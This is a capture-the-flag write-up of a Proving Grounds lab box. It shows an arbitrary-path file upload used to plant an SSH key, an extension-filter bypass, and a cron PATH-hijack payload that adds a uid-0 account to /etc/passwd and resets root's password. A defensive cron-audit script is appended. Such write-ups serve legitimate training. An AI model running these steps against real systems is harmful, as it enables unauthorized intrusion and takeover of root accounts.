PGPlay-Amaterasu

Overview

Target: Amaterasu
Platform: Proving Grounds Play
OS: Linux (Fedora / Apache 2.4.53)

The attack path was:

  1. Enumerate exposed custom web API endpoints.
  2. Abuse file upload to write an SSH public key into alfredo's authorized_keys.
  3. SSH as alfredo.
  4. Abuse PATH hijacking in a root cron script to execute a malicious tar.
  5. Get root access and retrieve proof.

1. Initial enumeration

nmap -sV -p- 192.168.143.249 -T4 -oN amaterasu.nmap

Result:

Nmap scan report for 192.168.143.249
Host is up (0.025s latency).
Not shown: 65501 filtered tcp ports (no-response), 30 closed tcp ports (conn-refused)
PORT      STATE SERVICE
21/tcp    open  ftp
25022/tcp open  ssh
33414/tcp open  http
40080/tcp open  http

Web service on 33414 exposed an API:

curl -s http://192.168.143.249:33414/info
# Python File Server REST API v2.5

curl -s http://192.168.143.249:33414/help

Endpoints:

GET /info
GET /help
GET /file-list?dir=/tmp
POST /file-upload

2. Initial access - file upload to SSH

The upload endpoint accepted a filename parameter and wrote the uploaded content to whatever path that parameter named, with no restriction to the intended directory.

Quick write test:

curl -X POST "http://192.168.143.249:33414/file-upload?dir=/tmp" \
    -F "file=@test.txt" \
    -F "filename=/home/alfredo/test.txt"

Create attacker keypair:

ssh-keygen -t ed25519 -C 'alfredo@amaterasu' -f alfredo.id_ed25519

Direct .pub upload was blocked by extension filtering:

curl -X POST "http://192.168.143.249:33414/file-upload" \
    -F "file=@alfredo.id_ed25519.pub" \
    -F "filename=/home/alfredo/.ssh/authorized_keys"

# {"message":"Allowed file types are txt, pdf, png, jpg, jpeg, gif"}

Bypass: rename the public key to .txt so it passes the extension check; the filename parameter still points it at authorized_keys:

cp alfredo.id_ed25519.pub alfredo.id_ed25519.txt

curl -X POST "http://192.168.143.249:33414/file-upload" \
    -F "file=@alfredo.id_ed25519.txt" \
    -F "filename=/home/alfredo/.ssh/authorized_keys"

SSH access:

ssh -i alfredo.id_ed25519 -p 25022 alfredo@192.168.143.249

3. Privilege escalation - Cron & PATH abuse

/etc/crontab showed a root task every minute:

*/1 * * * * root /usr/local/bin/backup-flask.sh

Script content:

#!/bin/sh
export PATH="/home/alfredo/restapi:$PATH"
cd /home/alfredo/restapi
tar czf /tmp/flask.tar.gz *

The root-run script prepends a user-writable directory (/home/alfredo/restapi) to PATH and then calls tar by bare name rather than by absolute path, so any file named tar in that directory is executed as root every minute.

Create a malicious tar at /home/alfredo/restapi/tar:

cat > /home/alfredo/restapi/tar << 'EOF'
#!/bin/bash
echo "root2:$(openssl passwd test):0:0:root:/root:/bin/bash" >> /etc/passwd
echo "root:pwned" | /usr/sbin/chpasswd
EOF

chmod +x /home/alfredo/restapi/tar

Wait for cron execution (up to 1 minute), then switch to root:

su root2
# password: test

Alternatively, use the root password that the payload set:

su root
# password: pwned

Read proof:

cat /root/proof.txt

Attack Path Summary

Step            Description
Recon           Enumerated the custom Python File Server API
Initial Access  Arbitrary file upload wrote an SSH key to /home/alfredo/.ssh/authorized_keys
Foothold        SSH login as alfredo on port 25022
PrivEsc         Root cron script vulnerable to PATH hijacking (tar command)
Root            Malicious tar executed as root via cron

Key Takeaways

  • File extension filtering alone is not sufficient if the server does not also confine the destination path to the intended directory.
  • Arbitrary file write can often be chained into SSH authorized key access.
  • Cron scripts must use absolute paths for binaries (/usr/bin/tar) and avoid user-controlled directories in PATH.
  • Review every root cron job early during Linux privilege escalation.
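
As an added example (not part of the original writeup), a POSIX sh audit that flags the two defects backup-flask.sh had: a PATH assignment that adds a non-system directory, and a tool invoked by bare name instead of an absolute path. The trusted directory list and the tool names are assumptions; the demo runs the audit over a constructed copy of the vulnerable script and over a hardened rewrite.

```shell
#!/bin/sh
# Added example (not from the writeup): audit a cron script for the two defects
# backup-flask.sh had. SYSTEM_DIRS and TOOLS are assumptions: only these
# directories are trusted, and these are the commands the script may call.
SYSTEM_DIRS="/usr/local/sbin /usr/local/bin /usr/sbin /usr/bin /sbin /bin"
TOOLS="tar cp mv rsync gzip find"

# Succeed only if $1 is one of the trusted system directories.
is_system_dir() {
    for d in $SYSTEM_DIRS; do
        [ "$1" = "$d" ] && return 0
    done
    return 1
}

# Print one finding per line; return 0 when clean, 1 when anything was flagged.
audit_cron_script() {
    script="$1"; rc=0
    # 1. PATH assignments that add directories outside SYSTEM_DIRS.
    for value in $(sed -n 's/^[[:space:]]*\(export[[:space:]]*\)\{0,1\}PATH=//p' "$script" | tr -d "\"'"); do
        old_ifs=$IFS; IFS=:; set -- $value; IFS=$old_ifs
        for dir in "$@"; do
            case "$dir" in '$PATH'|'${PATH}'|'') continue ;; esac   # inherited PATH
            if ! is_system_dir "$dir"; then
                echo "PATH adds non-system directory: $dir"; rc=1
            fi
        done
    done
    # 2. Tools invoked by bare name ('tar ...') instead of an absolute path.
    for tool in $TOOLS; do
        if grep -v '^[[:space:]]*#' "$script" | grep -Eq "(^|[[:space:]|;&])$tool([[:space:]]|\$)"; then
            echo "command '$tool' invoked without an absolute path"; rc=1
        fi
    done
    return $rc
}

# Demo: a constructed copy of the vulnerable script beside a hardened rewrite.
demo() {
    vuln=$(mktemp); fixed=$(mktemp)
    printf '%s\n' '#!/bin/sh' 'export PATH="/home/alfredo/restapi:$PATH"' \
        'cd /home/alfredo/restapi' 'tar czf /tmp/flask.tar.gz *' > "$vuln"
    printf '%s\n' '#!/bin/sh' 'PATH=/usr/bin:/bin' 'cd /home/alfredo/restapi' \
        '/usr/bin/tar czf /tmp/flask.tar.gz *' > "$fixed"
    for f in "$vuln" "$fixed"; do
        if audit_cron_script "$f"; then echo "$f: clean"; else echo "$f: UNSAFE"; fi
    done
    rm -f "$vuln" "$fixed"
}
demo
```

The command check is a line-based heuristic (it skips comment lines and only knows the names in TOOLS), so treat a clean result as a prompt for manual review rather than proof of safety.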